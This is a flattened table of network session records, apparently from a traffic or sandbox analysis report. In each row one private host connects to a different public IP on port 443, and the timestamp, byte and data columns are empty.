                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16810192.168.2.2349076216.250.3.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16811192.168.2.2333760138.241.180.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16812192.168.2.234098652.171.147.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16813192.168.2.235862424.201.165.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16814192.168.2.234989254.128.110.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16815192.168.2.2335868154.249.24.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16816192.168.2.235841231.173.46.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16817192.168.2.2348786177.218.9.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16818192.168.2.235522823.233.168.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16819192.168.2.235494014.100.187.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16820192.168.2.233857451.132.48.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16821192.168.2.233477488.74.158.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16822192.168.2.2346940171.151.186.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16823192.168.2.233923275.60.62.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16824192.168.2.2356312185.41.96.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16825192.168.2.2352146180.33.100.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16826192.168.2.2345880176.9.193.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16827192.168.2.2344352113.121.236.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16828192.168.2.2348298121.192.87.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16829192.168.2.2347398105.210.164.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16830192.168.2.2356858200.116.227.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16831192.168.2.235311472.6.66.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16832192.168.2.233929274.144.87.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16833192.168.2.2336602164.100.69.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16834192.168.2.2343780141.235.150.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16835192.168.2.2335030216.219.85.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16836192.168.2.2352038147.212.73.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16837192.168.2.2349640115.42.43.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16838192.168.2.2354200105.236.113.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16839192.168.2.235839498.78.207.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16840192.168.2.2357158140.41.31.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16841192.168.2.233944245.197.162.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16842192.168.2.233989251.150.90.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16843192.168.2.2342104157.7.72.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16844192.168.2.233701817.174.30.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16845192.168.2.2341548157.219.7.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16846192.168.2.234599465.182.245.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16847192.168.2.234198862.103.73.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16848192.168.2.2356662135.254.48.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16849192.168.2.234168218.172.130.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16850192.168.2.23490309.90.188.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16851192.168.2.2359116203.66.170.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16852192.168.2.2342236166.102.114.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16853192.168.2.2339472209.157.86.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16854192.168.2.23407785.52.129.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16855192.168.2.2357940171.54.18.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16856192.168.2.2357906124.50.29.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16857192.168.2.234150270.138.148.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16858192.168.2.235472613.23.130.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16859192.168.2.2334020156.229.127.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16860192.168.2.2346196146.24.242.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16861192.168.2.234508085.192.73.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16862192.168.2.234881834.42.9.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16863192.168.2.2341824186.139.0.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16864192.168.2.2356868192.35.190.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16865192.168.2.233312294.139.178.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16866192.168.2.2338260145.234.205.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16867192.168.2.234441254.96.242.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16868192.168.2.235902086.92.94.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16869192.168.2.234927457.59.239.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16870192.168.2.2352262126.65.225.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16871192.168.2.2359334200.106.194.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16872192.168.2.2356674110.128.101.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16873192.168.2.2336560124.26.194.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16874192.168.2.234636012.246.113.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16875192.168.2.235682897.215.40.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16876192.168.2.2346818116.114.210.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16877192.168.2.235097648.65.90.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16878192.168.2.233858645.99.139.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16879192.168.2.2340478150.151.105.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16880192.168.2.2354212181.85.8.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16881192.168.2.235781063.250.121.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16882192.168.2.234549425.74.103.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16883192.168.2.2357006191.14.215.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16884192.168.2.235720098.255.252.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16885192.168.2.2355088177.14.203.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16886192.168.2.2352406195.77.97.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16887192.168.2.236047236.192.51.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16888192.168.2.2336812191.231.22.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16889192.168.2.233424841.55.53.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16890192.168.2.2343618161.156.123.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16891192.168.2.235276441.20.13.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16892192.168.2.2357458212.34.128.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16893192.168.2.2345908133.39.108.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16894192.168.2.235060834.221.242.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16895192.168.2.2337160146.253.8.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16896192.168.2.233535645.28.148.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16897192.168.2.234082281.173.229.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16898192.168.2.2349848129.21.58.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16899192.168.2.233807281.253.225.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16900192.168.2.235516225.19.220.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16901192.168.2.2350242142.123.70.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16902192.168.2.234459635.61.112.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16903192.168.2.234731469.54.58.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16904192.168.2.233686693.132.116.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16905192.168.2.2337886212.249.155.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16906192.168.2.2358576136.48.82.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16907192.168.2.2339122170.107.71.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16908192.168.2.233942248.242.90.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16909192.168.2.2347500116.236.185.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16910192.168.2.2348584145.118.164.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16911192.168.2.2345936154.57.171.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16912192.168.2.2335912149.190.201.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16913192.168.2.233982243.147.167.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16914192.168.2.235789070.127.229.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16915192.168.2.234318267.19.115.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16916192.168.2.2345386132.98.161.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16917192.168.2.2341292158.242.49.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16918192.168.2.235348032.14.106.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16919192.168.2.23516385.58.181.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16920192.168.2.234733689.109.29.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16921192.168.2.233379844.156.146.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16922192.168.2.234022441.212.229.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16923192.168.2.234007481.55.161.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16924192.168.2.2350892190.84.251.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16925192.168.2.235443294.92.120.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16926192.168.2.2333220174.30.20.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16927192.168.2.2354184155.185.255.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16928192.168.2.2335126208.5.108.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16929192.168.2.2360724132.45.158.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16930192.168.2.23458922.160.85.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16931192.168.2.2360054173.5.133.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16932192.168.2.233451267.174.171.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16933192.168.2.2355440151.125.110.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16934192.168.2.2356684185.243.78.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16935192.168.2.234814647.108.55.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16936192.168.2.235630436.193.133.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16937192.168.2.2355566154.203.226.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16938192.168.2.2348092181.129.194.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16939192.168.2.234590260.127.113.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16940192.168.2.235589869.232.195.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16941192.168.2.2358250129.164.112.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16942192.168.2.2337558171.155.191.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16943192.168.2.2343106185.160.107.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16944192.168.2.2344608220.248.96.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16945192.168.2.235127620.18.193.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16946192.168.2.2348500101.123.140.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16947192.168.2.2354384216.208.218.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16948192.168.2.233443285.3.154.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16949192.168.2.2335102132.252.40.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16950192.168.2.235767460.52.137.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16951192.168.2.2349946149.152.30.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16952192.168.2.2333100221.188.188.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16953192.168.2.233956286.6.98.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16954192.168.2.2342700181.57.56.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16955192.168.2.2340244221.4.50.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16956192.168.2.2349172147.10.199.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16957192.168.2.2350126172.32.212.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16958192.168.2.235903858.216.20.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16959192.168.2.2338176176.142.100.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16960192.168.2.2344466149.154.222.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16961192.168.2.23390808.83.26.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16962192.168.2.2357348119.119.146.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16963192.168.2.235931243.156.178.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16964192.168.2.2343382194.228.35.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16965192.168.2.2346804117.223.182.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16966192.168.2.2332978104.7.225.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16967192.168.2.233338031.224.114.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16968192.168.2.235205260.68.214.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16969192.168.2.2347668162.173.135.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16970192.168.2.2345016211.215.173.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16971192.168.2.2360872150.94.134.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16972192.168.2.234175699.196.86.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16973192.168.2.2339794137.77.43.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16974192.168.2.2338050164.209.132.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16975192.168.2.234029874.168.84.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16976192.168.2.2340502209.127.166.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16977192.168.2.233507697.166.52.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16978192.168.2.2353612147.240.23.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16979192.168.2.2347126178.144.80.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16980192.168.2.2355774101.57.171.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16981192.168.2.2349346171.59.133.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16982192.168.2.2352786217.138.203.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16983192.168.2.2341340148.88.58.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16984192.168.2.2337604115.228.133.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16985192.168.2.2354890109.72.56.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16986192.168.2.234578866.160.37.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16987192.168.2.2356810193.89.136.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16988192.168.2.235406249.108.197.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16989192.168.2.2351650194.236.71.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16990192.168.2.2334600210.86.48.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16991192.168.2.235926817.70.104.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16992192.168.2.2355874183.111.245.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16993192.168.2.235281831.235.251.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16994192.168.2.233529063.22.15.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16995192.168.2.234105275.204.252.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16996192.168.2.2342266187.215.71.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16997192.168.2.2344584118.138.67.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16998192.168.2.2358872120.83.89.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16999192.168.2.2355520195.100.97.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17000192.168.2.2355088130.80.102.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17001192.168.2.235294435.6.108.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17002192.168.2.234219835.199.190.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17003192.168.2.2357972102.254.206.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17004192.168.2.2339440109.162.247.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17005192.168.2.235131879.90.242.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17006192.168.2.2338802177.117.98.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17007192.168.2.233899020.35.47.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17008192.168.2.2341410145.92.81.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17009192.168.2.2335614110.247.23.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17010192.168.2.2353454200.127.179.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17011192.168.2.2344016173.46.225.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17012192.168.2.233698875.190.214.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17013192.168.2.2359926220.18.210.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17014192.168.2.2333542170.129.131.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17015192.168.2.2360128110.120.120.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17016192.168.2.235009242.120.211.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17017192.168.2.2346082180.153.229.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17018192.168.2.2334940182.220.0.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17019192.168.2.2360084150.89.53.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17020192.168.2.2351692160.119.242.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17021192.168.2.2355882207.142.34.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17022192.168.2.2334752107.234.24.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17023192.168.2.2359408144.224.173.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17024192.168.2.2356218137.205.94.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17025192.168.2.2358492212.211.49.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17026192.168.2.233584277.61.252.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17027192.168.2.235561044.214.188.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17028192.168.2.2337634157.230.47.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17029192.168.2.235048857.82.29.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17030192.168.2.235042879.249.25.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17031192.168.2.2333678194.154.50.193443
